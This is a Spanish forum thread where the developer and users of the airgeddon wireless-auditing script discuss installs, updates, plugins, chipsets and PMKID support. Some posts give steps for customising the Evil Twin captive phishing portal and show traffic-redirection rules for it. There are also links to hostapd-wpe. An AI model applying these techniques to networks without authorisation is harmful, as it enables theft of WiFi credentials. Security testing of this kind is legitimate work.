Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 26-10-2019, 20:22 (Sábado)
Es que hay un paquete que se llama beef que no tiene nada que ver con BeEF. airgeddon se toma la molestia de detectarlo y decirtelo si es que instalaste el que no era como parece tu caso. Ese paquete está disponible por apt y BeEF no lo está en distribuciones como debian o ubuntu y por eso lleva a la confusión. Por eso hicimos lo de que se detectase y te lo dijera. Desinstala ese paquete e instala el bueno (pero no será por apt).

Mira la wiki. hay un apartado de BeEF que te redirige a la pagina oficial de BeEF donde explican como instalarlo. Pero ya es hacerlo con ruby y tal. Eso se complica porque Ubuntu no es una distro de pentesting donde vengan las tools ya listas para instalar. Yo suelo usar Parrot o Kali donde es muy facil instalar todo ya que todos los paquetes que airgeddon necesita están disponibles por apt. En Wifislax la verdad es que hubo un tiempo donde venía todo instaladito y funcionaba de lujo, pero creo que no se ha mantenido. Igual un admin podría echar un ojo a la última versión de airgeddon e instalar todo lo que necesita para la siguiente release, pero no se que mas decirte.

Bueno, otra cosa importante que tienes que hacer si usas Ubuntu es el tema de los nombres de las tarjetas, que tienen la nueva nomenclatura en lugar de llamarse wlan0 y tal como siempre. Mirate esto: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Consistent%20Network%20Device%20Naming

Como siempre digo... mirad el wiki q está todo bastante bien explicado! también te digo que es complicado mantener la compatibilidad con tantos Linux. Se hace lo que se puede. Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: kiabras en 26-10-2019, 22:25 (Sábado)
en  que directorio esta el index.html? en kali en www en wifixlax no lo encuentro


ok edito en tmp/www
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-10-2019, 15:23 (Domingo)
Hola, si te refieres al index.html del portal cautivo, se crea en una carpeta temporal en /tmp/www

Si lo que quieres es personalizar el portal cautivo puedes hacerlo:
1. Levanta el portal cautivo
2. Copiate los ficheros de la carpeta /tmp/www a otra ubicación
3. Para el ataque y prepara tranquilamente el portal cautivo de forma offline
4. Cuando lo tengas listo lanza el ataque de nuevo y copia los ficheros de tu portal modificado a /tmp/www

Listo!

Si tenéis dudas, os animo a que entréis a preguntar dudas al canal de Discord que hemos creado sobre airgeddon (lo siento pero allí se habla en inglés). Dejo aquí el enlace de invitación: #######
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-11-2019, 15:22 (Lunes)
Dicho y hecho!! la nueva versión de airgeddon v10.0 con el sistema de plugins (y otros features) ha visto la luz!!!

Changelog:

Citar
v10.0
 - Added plugins system
 - Added example plugin: Missing dependencies auto-installation for some distros (Kali, Parrot, BlackArch)
 - Improvements for Evil Twin on captive portal detection for newer devices
 - Missing 5GHz channels added
 - Github pull request template added and issue templates updated
 - Fixed error on hex2ascii conversion for some WEP passwords

Ahora la gente podrá desarrollar sus propias modificaciones de airgeddon sin apenas despeinarse... gracias al sistema de hooking de funciones que hemos creado (prehook, override y posthook), podemos elegir la función de airgeddon que actúe sobre la parte que queremos cambiar y de forma sencilla hacer las modificaciones oportunas. Más info aquí en estos links:
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20System (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20System)
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Development (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Development)

Además se ha creado una sección nueva en el Wiki "Plugins Hall of Fame" https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Hall%20of%20Fame (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Hall%20of%20Fame) donde pondremos enlaces externos a los plugins que haga la gente y que tengan cierta calidad.

No sabemos que repercusión tendrá esto... si luego no desarrollará plugins ni dios o si va a ser un pelotazo. En cualquier caso hemos disfrutado haciéndolo y creemos que es uno de esos features que pueden marcar la diferencia porque abren muchísimo las posibilidades para la comunidad.

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 13-11-2019, 04:03 (Miércoles)
Men , desde la v9.23 , no puede actualizarse a la v10 , dice siempre que no se puede acceder al repositorio , vamos al github.

Tengo conexion bien y demas , he bajado el tarball desde el git, osea que no se por que le pasa eso ... te lo digo por que si es del script 9.23 , habria que avisar ya que nadie se va a enterar que existe la v10 si no lee los foros en los que escribes.

Voy a hacer la actualizacion a mano ..jejeje , buen trabajo y mucha paziencia.

Código: [Seleccionar]
Parece que tu conexión a internet no es estable. El script no puede conectar al repositorio. Continuará sin actualizarse...
Pulsa la tecla [Enter] para continuar...

revisare la funcion de buscar actualizaciones a ver si es que me falla algo a mi en mi sistema.

pues no se, puede que sea algo transitorio , desde el navegador tampoco deja
Código: [Seleccionar]
https://raw.githubusercontent.com/v1s1t0r1sh3r3/airgeddon/master/airgeddon.sh
Código: [Seleccionar]
No puedes acceder a raw.githubusercontent.com en este momento porque el sitio web utiliza HSTS. Los ataques y los errores de red suelen ser temporales, por lo que es probable que esta página funcione más tarde.


Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-11-2019, 23:32 (Miércoles)
Hola USUARIONUEVO, que bueno volver a saber de ti!  ;)

Ok vamos por partes... para comenzar decir que la versión 10 está gustando mucho, tengo el canal de discord lleno de gente probando airgeddon y jugueteando con los plugins. Un plugin importante que ha salido es el que compatibiliza airgeddon con las dichosas tarjetas con chipset Realtek RTL8812AU. Estas tarjetas tienen un driver un poco "rebelde" que pinta la salida de los comandos iwconfig y airmon como le da la gana en lugar de hacerlo como lo hacen todas. Nos han pedido muchas veces a través de issues en github hacer algo, y siempre nos hemos negado por no llenar el código fuente de airgeddon de cosas específicas para una tarjeta. Bien, ahora que existen los plugins se ha creado este: https://github.com/OscarAkaElvis/airgeddon_realtek_chipset_fixer

No es que sea la panacea porque sigue habiendo problemas que no tienen que ver con airgeddon, es decir, que los temas que le siguen fallando al driver pues lógicamente siguen fallando... el tema del WPS mal, y cuando la tarjeta hace split en un Evil Twin, el AP se crea, pero el DoS en paralelo no lo hace bien y repito, todo es culpa del driver. No obstante, el plugin soluciona los problemas de parseos de la salida y compatibiliza estas tarjetas permitiendo usarlas en airgeddon para un uso básico, escaneos, cambiar de modo de managed a monitor y viceversa, etc.

Bueno, una vez hecha la promo del plugin chulo... jejeje, comentar que algo raro debe estar pasando con ese update ya que he estado haciendo pruebas y solo hay un caso en el que haya podido reproducir el problema además de en Wifislax. En BlackArch también pasa, lo que ocurre es que ahí no se nota porque como airgeddon está en sus repos y tiene los updates desactivados porque se actualiza por los repos, pues no hay problema... pero parece que sea lo que sea que esté pasando, allí también ocurre. Si activamos las actualizaciones, desde la 9.23 a la 10.0 da ese error de que la conexion es inestable etc etc y no se descarga. Algo bastante raro ya que el código de airgeddon no ha cambiado en esa parte entre estas versiones. Eso parece indicar claramente que es algún factor externo lo que ha cambiado... me atrevería a decir sin haberlo mirado bien aún que será wget o curl (no recuerdo ahora exactamente como se hacía el update), igual al ser una URL con https ahora alguna nueva versión de estas herramientas ha cambiado su comportamiento por defecto y hace falta algún parámetro para que ignore errores o warnings de certificado o alguna chorrada por el estilo.

Bueno, varias cosas

1. Voy a indagar a ver si veo que puede estar pasando
2. Genial que actualices el script en Wifislax
3. Para aquellos que quieran la versión 10 y no se les actualice, seguid estas instrucciones:

Entrar al github y descargad la versión 10 ya sea con un comando git clone o descargando el fichero zip de la rama master o de la release con el tag 10.0, ahora mismo es exactamente lo mismo.
En wifislax si no recuerdo mal, airgeddon está en la carpeta /opt/airgeddon/ , bien pues copiad los ficheros descargados a esa ubicación. El repo tiene mucha "morralla" no necesaria para la ejecución como ficheros .md , licencia, etc etc... realmente solo os hacen falta los ficheros airgeddon.sh , language_strings.sh , known_pins.db , y .airgeddonrc (no os olvideis de este que al comenzar por punto, aparece como oculto, como todos los ficheros que comienzan por un punto en Linux). Ahhh y la mandanga nueva de la versión 10!!! que tiene una carpeta que se llama plugins con un par de ficheros .sh dentro. Esos no son necesarios pero si los copiais mejor. De tal forma que la carpeta plugins también exista en /opt/airgeddon/plugins y ya está!

Lo dicho, investigo a ver que narices pasa con el auto-update... es curioso que solo pasa en Wifislax y BlackArch y como comentaba, en BlackArch pasa desapercibido porque está quitado el auto-update... lo miro. Gracias!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-11-2019, 23:56 (Miércoles)
Pfff... no tiene que ver con el linux ni con nada que hayamos hecho nosotros. Parece que está relacionado con un tema DNS. Por lo que sea, no se está resolviendo bien el dominio raw.githubusercontent.com y claro, abre una página de error que tiene un certificado autofirmado que da el error que comentabas.

Si lo meteis en el fichero /etc/hosts de forma fija funciona todo bien. Yo lo puse así y ya no da error

140.82.113.4 github.com
151.101.132.133 raw.githubusercontent.com githubusercontent.com

Lo que ocurre es que esto es un "fix" barato... de todos modos creo que esto no está en nuestras manos arreglaro. Tendrán que arreglar la redirección DNS de turno y todo volverá a la normalidad.

Es curioso, me fallaba en el Wifislax y en BlackArch porque son los únicos sistemas donde no tenía metido eso en el fichero hosts. ¿Que por qué meto a veces cosas de estas en el hosts? pues ahora mismo no recuerdo pero me suena que algo parecido pasó en otra época y desde entonces me curo en saludo.

Saludos terrícolas!




En un windows que tengo, metí en el hosts las direcciones de github "hardcodeadas" y me las resuelve bien y todo va perfect. En
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-11-2019, 12:28 (Viernes)
Tampoco hace falta tocar el fichero hosts, con que utilices unos dns decentes vale. No se si es que hoy ya lo habrán arreglado por fin o si ha sido casualidad, pero utilizando dns como el 1.1.1.1 o los de google 8.8.8.8 o el 8.8.4.4 funciona bien!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 15-11-2019, 21:53 (Viernes)
Tampoco hace falta tocar el fichero hosts, con que utilices unos dns decentes vale. No se si es que hoy ya lo habrán arreglado por fin o si ha sido casualidad, pero utilizando dns como el 1.1.1.1 o los de google 8.8.8.8 o el 8.8.4.4 funciona bien!

Lo han arreglao ... ya va bien sin tocar nada
Título: como reparar mas que reparar los errores del airgeddon
Publicado por: vapo en 25-12-2019, 13:37 (Miércoles)
hola chicos vereis en kali linux para reparar los errores del airgeddon hay que hacer esto
para abrir el ageddon cogemos el archivo y le damos en abrir en una terminal
1- ls
2- chomd +x airgeddon.sh
3- ls
4- ./airgeddon.sh

y con esto se conecta el airgeddon en la consola
siguentes pasos para reparar errores
abtrimos del mismo archivo otra consola

5- apt-get update
6- clear
7- apt-get install ----(como nos diga el error o errores que venga del archivo de airgeddon

lo he intentado en wifislax y a lo maximo que lleguo es en abrir en consola con airgeddon.sh cual es el siguente paso para reparar el error por que pongo apt-get update y no lo hace como en kali linux en fin si alguen me puede echar una mano lo agradeceria

otra cosa el driver nvdia para el hashcat ahy que instalarlo de alguna forma en especial como el hashcat por que tengo todas las versiones el wifislax 4.11, 4.12 el 64.10 - 64.1.1 - 64.2.0 y en ninguna consiguo que arranque vamos que siempre dice lo mismo no esta instalado el driver ehhh y pongo los modulos en la caperta modules es que ahy que hacer algo mas ?

oes es el driver de mi ordenador que no sirve es:- NVDIA  GeForce 7900 GS a lo mejor no sirve y si no sirve que tarjeta grafica recomendarias para que sirviera

a ver si me podeis echar una mano por que esto deseando juntar el hashcat con el airgeddon que tiene que ser eso la caña de españa de antemano muchas gracias y felices fiestas
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-12-2019, 13:49 (Miércoles)
Veo por los comentarios que no estás muy familiarizado con los entornos Linux. Los comandos apt y apt-get son para las distribuciones basadas en Debian como es Kali. Wifislax se basa en slackware por lo que no tiene esos comandos ni tiene nada que ver. Para instalar paquetes en Wifislax seguro que un admin te puede ayudar mejor que yo, aunque básicamente la forma más facil es descargar el fichero xzm y darle a botón derecho del ratón e instalarlo.

Respecto a lo del driver... airgeddon solo usa CPU para hashcat. La gráfica le da igual. Si quieres usar GPU en lugar de CPU para usar tu gráfica, efectivamente has de tener buena gráfica y los drivers configurados correctamente y eso es algo que puede ser bastante complejo de realizar. No te recomiendo meterte ahí si no estás versado en Linux.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Hwagm en 25-12-2019, 19:10 (Miércoles)
Y del paso del 1 al 4 eso no es para arreglar nada es solo para darle permisos de ejucion a un fichero en Linux.

Lo del 5 al 7 ya te lo han explicado perfectamente

Pd: y por favor no le cambiemos los títulos a los post
Título: Re:Script multiuso en bash, airgeddon
Publicado por: vapo en 25-12-2019, 20:14 (Miércoles)
de antemano si que estoy pez
Hwagm siento si he cambiado el titulo del post es que es la primera vez que escribo aqui (mis disculpas mas sinceras )

v1s1t0r pues si as aceptado jajaj no estoy muy familiarizado con el Debian ni con slackware solo queria saber ya que al estilo Debian donde mire un tutorial que cuando te da error en por ejemplo bettercap o mdk4 tu pones
apt-get install bettercap y se descarga archivos o pones apt-get install mdk4 se descarga archivos y se arregla eso  en formato Debian o kali linux bien hay alguna ejecucion u orden o como se diga que se ponga en la konsola  para  el  formato o como se llame  slackware (vamos para wifislax )

pues respecto a lo modulos si es verdad por mas que meto cualquier modulo en lo de modules es verdad no sale en eso estoy muy pez y por mas que veo videos tutoriales no terminan de explicarlo lo unico que me sale asta ahora bien es lo de los patrones conocidos que lo actualize o instale o descarge o como se diga jajaja de la auditoria en actualizadores lo meti en modules y esta siempre actualizado jajaja  ;) y eso de configurar los drives si me gustaria saber en fin ¡vaya lio ¡ jajaja  >:( gracias de antemano
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 26-12-2019, 02:47 (Jueves)
salu2
podrian crear xzm de hostapd-wpe yo de eso fallo mucho ...
para poder usar ultimas mejoras
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 26-12-2019, 03:40 (Jueves)
hostapd-wpe-2.7
https://mega.nz/#!DhZiHSRB!VMKrJDAZ9ihbsp0SfmA1SVwDxhDkc4lPkASb-xFFSYQ

mira a ver lo de hashcat

me cito a mi mismo , de este mismo hilo ...

tambien deje hace como un mes, una iso ...actualizada , aunque ya tiene unos meses y por ejemplo estoy usando kernel 5.4
https://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/wifislax64-iso-de-desarrollo-para-probar/
Título: Re:Script multiuso en bash, airgeddon
Publicado por: vapo en 26-12-2019, 22:07 (Jueves)
gracias usuarionuevo este hostap-wpe 2,7 es para todas la versiones o solo para la ultima 64.2.0 y claro ya lo tengo descargado eh que hay que hacer meterlo en modules o ahy que ejecutarlo en konsola oh no se por que no ago mas que descarga cosas y no va naa  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 26-12-2019, 22:25 (Jueves)
gracias usuarionuevo este hostap-wpe 2,7 es para todas la versiones o solo para la ultima 64.2.0 y claro ya lo tengo descargado eh que hay que hacer meterlo en modules o ahy que ejecutarlo en konsola oh no se por que no ago mas que descarga cosas y no va naa  >:(

es para wifislax64-2.0 , pones el xzm que te bajas en modules..y debes iniciar el sistema cuando ya este copiado , de nada sirve copiarlo cuando ya estas dentro de wifislax... y tampoco te va a suponer ninguna mejora, es solo un fichero que busca airgeddon ,... 
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 27-12-2019, 12:32 (Viernes)
Hola:

Que chipset wifi usb de 5 GHz son compatibles con airgeddon para practicar con un ataque evil twin con falso ap en mi red?
Tengo un usb wifi con el chipset mt76x0 2.4/5Ghz, puedo capturar el handshare con airgeddon, pero a la hora de montar el falso ap, airgeddon hace como que lo crea, pero en realidad no crea la red abierta.
Estoy con la ultima distro de wifislax.

Muchas gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-01-2020, 11:45 (Jueves)
Mira esta lista de chipsets 100% compatibles. Sacado del wiki de airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets

De las listadas, las tarjetas Panda son baratitas y muy fáciles de encontrar en Amazon, ebay o en cualquier sitio.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-01-2020, 10:10 (Miércoles)
Hola, hoy ha salido airgeddon v10.01 con algunos pequeños cambios, fixes y sobre todo ya sin las dependencias de net-tools y wireless-tools ya que ha dejado de utilizar ifconfig/iwconfig

También en la v10.01 ya funcionan las tarjetas con chipset Realtek sin necesidad del plugin que se generó para la v10.0 ya que los problemas venían del uso de iwconfig y su diferente salida. Ahora eso ya no afecta y funcionan bien sin plugin.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 09-01-2020, 12:06 (Jueves)
Hola, hoy ha salido airgeddon v10.01 con algunos pequeños cambios, fixes y sobre todo ya sin las dependencias de net-tools y wireless-tools ya que ha dejado de utilizar ifconfig/iwconfig

También en la v10.01 ya funcionan las tarjetas con chipset Realtek sin necesidad del plugin que se generó para la v10.0 ya que los problemas venían del uso de iwconfig y su diferente salida. Ahora eso ya no afecta y funcionan bien sin plugin.

Saludos.
Pues a actualizarlo ..gracias!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: xumixurri en 12-01-2020, 20:39 (Domingo)
Hola:

Que chipset wifi usb de 5 GHz son compatibles con airgeddon para practicar con un ataque evil twin con falso ap en mi red?
Tengo un usb wifi con el chipset mt76x0 2.4/5Ghz, puedo capturar el handshare con airgeddon, pero a la hora de montar el falso ap, airgeddon hace como que lo crea, pero en realidad no crea la red abierta.
Estoy con la ultima distro de wifislax.

Muchas gracias

Hola Compi,

He probado a bajarme el modulo xzm de hostapd-wpe-2.7, ya que al actualizar el airgeddon a la 10.1 me lo solicita y he visto que ya no esta disponible tu descarga en mega y tampoco la imagen de wifislax tuya que tambien habías colgado en mega.
La podría volver a subir?

Gracias y saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 12-01-2020, 22:01 (Domingo)
Hola:

Que chipset wifi usb de 5 GHz son compatibles con airgeddon para practicar con un ataque evil twin con falso ap en mi red?
Tengo un usb wifi con el chipset mt76x0 2.4/5Ghz, puedo capturar el handshare con airgeddon, pero a la hora de montar el falso ap, airgeddon hace como que lo crea, pero en realidad no crea la red abierta.
Estoy con la ultima distro de wifislax.

Muchas gracias

Hola Compi,

He probado a bajarme el modulo xzm de hostapd-wpe-2.7, ya que al actualizar el airgeddon a la 10.1 me lo solicita y he visto que ya no esta disponible tu descarga en mega y tampoco la imagen de wifislax tuya que tambien habías colgado en mega.
La podría volver a subir?

Gracias y saludos.

y que tal si lo compilas ..

https://github.com/wifislax-ng/Custom-Slackbuilds/tree/master/hostapd-wpe-2.7
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-01-2020, 23:05 (Domingo)
Lo subí yo a mi mega: https://mega.nz/#!IQgzhIoD!7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU
Título: Re:Script multiuso en bash, airgeddon
Publicado por: xumixurri en 13-01-2020, 14:24 (Lunes)
Muchas gracias a los 2.
@USUARIONUEVO: No llego en conocimientos para compilar.

Saludos.


Lo subí yo a mi mega: https://mega.nz/#!IQgzhIoD!7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU

Hola:

Que chipset wifi usb de 5 GHz son compatibles con airgeddon para practicar con un ataque evil twin con falso ap en mi red?
Tengo un usb wifi con el chipset mt76x0 2.4/5Ghz, puedo capturar el handshare con airgeddon, pero a la hora de montar el falso ap, airgeddon hace como que lo crea, pero en realidad no crea la red abierta.
Estoy con la ultima distro de wifislax.

Muchas gracias

Hola Compi,

He probado a bajarme el modulo xzm de hostapd-wpe-2.7, ya que al actualizar el airgeddon a la 10.1 me lo solicita y he visto que ya no esta disponible tu descarga en mega y tampoco la imagen de wifislax tuya que tambien habías colgado en mega.
La podría volver a subir?

Gracias y saludos.

y que tal si lo compilas ..

https://github.com/wifislax-ng/Custom-Slackbuilds/tree/master/hostapd-wpe-2.7
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-02-2020, 22:37 (Domingo)
Vamos a implementar la mandanga de PMKID para la próxima versión. Más vale tarde que nunca
Título: Re:Script multiuso en bash, airgeddon
Publicado por: VER en 12-02-2020, 19:39 (Miércoles)
Me bajado airgenddo PMKID y no consigo que funcione , sigo los pasos que siempre y tengo dos opciones PMKID y hascat .
Doy PMKID y no hace nada.Que echo mal. Gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 12-02-2020, 20:45 (Miércoles)
Yo actualmente tengo problemas por haber elegido una AMD RX590 que en win me va de fabula para mis "menesteres" pero con wifislax me da problemas pero en cuanto lo solucione me tienes probando tu script
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-02-2020, 23:05 (Miércoles)
@VER , es que no está terminado. Tengo un branch que se llama pmkid donde acabo de empezar a desarrollar... dame un mesecito o algo para que me de tiempo  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 13-02-2020, 21:51 (Jueves)
salu2

Código: [Seleccionar]
Todos los parámetros y requerimientos están listos. Va a comenzar el ataque. Se abrirán múltiples ventanas, no cierres ninguna. Cuando quieras parar el ataque pulsa [Enter] en esta ventana y el script cerrará automáticamente todo
Pulsa la tecla [Enter] para continuar...

Esta interfaz ha cambiado su nombre al ponerse en modo managed. Se ha seleccionado automáticamente
<cmdline>:1:54-55: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 80 counter dnat to 192.169.1.1:80
                                                     ^^
<cmdline>:1:55-56: Error: syntax error, unexpected to
add rule ip nat PREROUTING tcp dport 443 counter dnat to 192.169.1.1:80
                                                      ^^

El ataque Evil Twin ha comenzado. Pulse la tecla [Enter] en esta ventana para pararlo
Pulsa la tecla [Enter] para continuar...

Restaurando interfaz...


funciona funciona desvia a ap y tal cual pero sale ese feo mensaje en pantalla sobre wifislax
Código: [Seleccionar]
cat /etc/*version
Slackware 14.2
Wifislax64 2.0
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-02-2020, 00:10 (Viernes)
Parece q tienes algun problema con las nftables... cambia en el fichero de configuración .airgeddonrc y fuerza la opción para usar iptables y te funcionará ok. Echa un ojo en el wiki al apartado Options. Verás fácilmente la opción que te digo de iptables para ponerla en true y forzarlas a usarse en lugar de nft.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 14-02-2020, 11:14 (Viernes)
Hola.

Me ha dado por probar el airgeddon y me daba el mismo problema.

He forzado las iptables como indicas y ya no lo dá.

Gracias y buen trabajo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 14-02-2020, 21:25 (Viernes)
salu2
gracias
menos mal que tenemos find y locate... decir que es archivo oculto pepe ....
es un archivo con un punto delante no lo veran en la vida la demas usuarios si no ponen la opcion de ver archivos ocultos

(https://i.postimg.cc/TPVRCYdw/instant-nea1.png)

asi veran las opciones de configuracion
--
me gustaria crear mi propia conf ejemplo usar dnsmasq  en vez de dnspoof  y por ejemplo añadir otra interfaz para denegacion de servicio  y mas cosillas
pero no veo informacion muy clara sobre los plugins
es que la verdad cuando abro tu script y miro codigo te pillo poco o nada
despues es un script enorme lineas y lineas ......

por favor algo de mas info sobre los plugins y su creacion si alguno sabe
algo entendible para la gente normal con poco conocimiento
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-02-2020, 23:42 (Martes)
Hola, creo que sobre los plugins está bastante documentado.... aquí te explica de que va en líneas generales:

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20System

También te indica como usar el modo debug para localizar las funciones que quieras cambiar. Te explica como hacer que tu plugin afecte solo a algunas versiones, a algunas distros o a todas.

Aquí explica como funciona el hooking de funciones:

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Development

prehook -> el prehook de una función ejecutará lo que pongas en tu plugin justo antes de la función indicada
override -> si haces override de una función ejecutará tu código del plugin para dicha función en lugar de la función de airgeddon
posthook -> ejecutará lo que incluyas en tu plugin justo después de la función indicada

Aquí está el plugins hall of fame esperando que hagáis algo chulo para añadirlo (esto es una curiosidad más que otra cosa):

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20Hall%20of%20Fame

Pero sobre todo, tienes en la carpeta plugins un fichero plugin_template.sh que es una plantilla que explica todo muy bien para que la utilices y vayas sustituyendo cada apartado y función por tus propios nombres y puedas hacerlo de una forma fácil y sencilla.

También tienes un plugin de ejemplo que viene con airgeddon que está ya creado, en la carpeta plugins es el fichero missing_dependencies.sh del que te puedes "copiar" para que veas como funciona un plugin.

Creo que hay un montón de info y que está bastante bien documentado, lo que pasa es que ya te aviso que has de ser capaz de leerte tranquilamente el asunto y has de saber programar... nadie dijo que fuera fácil  ;D

Pero vamos, que hacer un plugin sencillo es muy facilito... otra cosa es querer tocar muchas funciones y hacer un plugin muy complejo. Por ejemplo, un plugin absurdo pero que sirve de ejemplo.... creas un fichero test.sh en la carpeta plugins con este contenido:

Citar
#!/usr/bin/env bash

#Global shellcheck disabled warnings
#shellcheck disable=SC2034

#Generic plugin vars
plugin_name="Set your plugin name here"
plugin_description="Set a short description of your plugin"
plugin_author="Set your nick/name here"

#Enabled 1 / Disabled 0 - Set this plugin as enabled - Default value 1
plugin_enabled=1

#Plugin requirements
#Set airgeddon versions to apply this plugin (leave blank to set no limits, minimum version recommended is 10.0 on which plugins feature was added)
plugin_minimum_ag_affected_version="10.0"
plugin_maximum_ag_affected_version=""
#Set only one element in the array "*" to affect all distros, otherwise add them one by one with the name which airgeddon uses for that distro (examples "BlackArch", "Parrot")
plugin_distros_supported=("*")


function test_override_echo_blue() {

   debug_print

   last_echo "${1}" "${pink_color}"
}

Es el plugin más tonto del mundo... solo cambia la función echo_blue para que en lugar de pintar azul pinte en rosa... es decir, hace un override y la sustituye por el código que le añadamos en el plugin. Recuerda que según la documentación, los nombres de la función están relacionados con el nombre del fichero del plugin... por eso se llama test.sh el fichero y las funciones test_xxxxx

Todo está en la documentación... no me voy a poner a explicar por aquí mucho más, sorry. Good luck!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 17-03-2020, 10:03 (Martes)
Arranco airgeddon en la ultima version de wifislax, se actualiza a la version 10.01, pero me da error al cargar el hostapd-wpe. ¿Como se soluciona?
Mas tarde, a la hora de realizar el portal cautivo con mi red de 5 Ghz, veo que no lo hace bien, porque me crea la red del portal cautivo en un canal distinto que va del 1-12. ¿Puede ser por el error en hostapd-wpe?

Muchasr gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-03-2020, 13:08 (Jueves)
Hola a todos, nueva release de airgeddon. La versión v10.10 con soporte de PMKID ya está fuera!! @USUARIONUEVO para ello tiene dos dependencias opcionales nuevas: hcxtools y hcxdumptool

@AntonioJaen, echa un ojo al hilo entero del foro, verás que hay por ahí un enlace a un mega con el paquete del hostapd-wpe para que lo puedas instalar.

Saludos!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 19-03-2020, 13:37 (Jueves)
v1s1t0r, muchas gracias. Solucionado.

Pero, lo de que no se cree el portal cautivo en el mismo canal de la mi red de 5 Ghz, porque será? Acaso no se puede crear el portal cautivo en un canal alto de 5Ghz?

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-03-2020, 20:10 (Jueves)
Hola a todos, nueva release de airgeddon. La versión v10.10 con soporte de PMKID ya está fuera!! @USUARIONUEVO para ello tiene dos dependencias opcionales nuevas: hcxtools y hcxdumptool

@AntonioJaen, echa un ojo al hilo entero del foro, verás que hay por ahí un enlace a un mega con el paquete del hostapd-wpe para que lo puedas instalar.

Saludos!!

las dependencias estan , tranquilo , ademas las suelo actualizar bastante por que aunque no salen muchas versiones como estables, hay mucho commit.

gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-03-2020, 20:44 (Jueves)
ALGO NO VA BIEN , no se si soy yo o el script ...

cuando ya sale la opcion de obtener PMKID , despues de escanear , y seleccionar cuando ya se ha detectado mi cleinte y demas , elijo el PMKID , dejo los valores por defecto pulsando ENTER , por un milisegundo se abre una terminal y se cierra sin mas .. y no se que esta pasando.

las dependencias todas pone OK , tanto popcionales como requeridas.

Código: [Seleccionar]
hcxdumptool-6.0.2-x86_64-1wifislax
hcxkeys-4.0.1_3a0c492-x86_64-1wifislax
hcxtools-5.3.0-x86_64-1wifislax


veo que hay una version nueva de hcxdumptool , pero salio ayer , no creo que sea eso , voy a actualizarlo.
nada , se cierra y no veo nada ni activando el debug.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: VER en 19-03-2020, 23:25 (Jueves)
Lo as hecho con la tarjeta gráfica AMD
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-03-2020, 23:28 (Jueves)
Lo as hecho con la tarjeta gráfica AMD

PMKID , solo se puede con NVIDIA , anda que vaya teeeelaaa....   [ironic off]
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-03-2020, 09:56 (Viernes)
Descargando la última iso de Wifislax (que si no estoy muy desactualizado es la 2.1-rc1) y haré pruebas... a ver si me funciona a mi o si consigo reproducir el error.

¿Esta lleva ya instalado de base el hostapd-wpe? ¿o sigue haciendo falta instalar el módulo que compilaste en su día? lo digo porque alguien andaba preguntando en un canal de discord el otro día, y les remití aquí y al link del módulo que lo subí a mi mega. Dejo el link por aquí otra vez: https://mega.nz/#!IQgzhIoD!7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU

Lo dicho, echo un ojo y os digo a ver que puede estar pasando.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
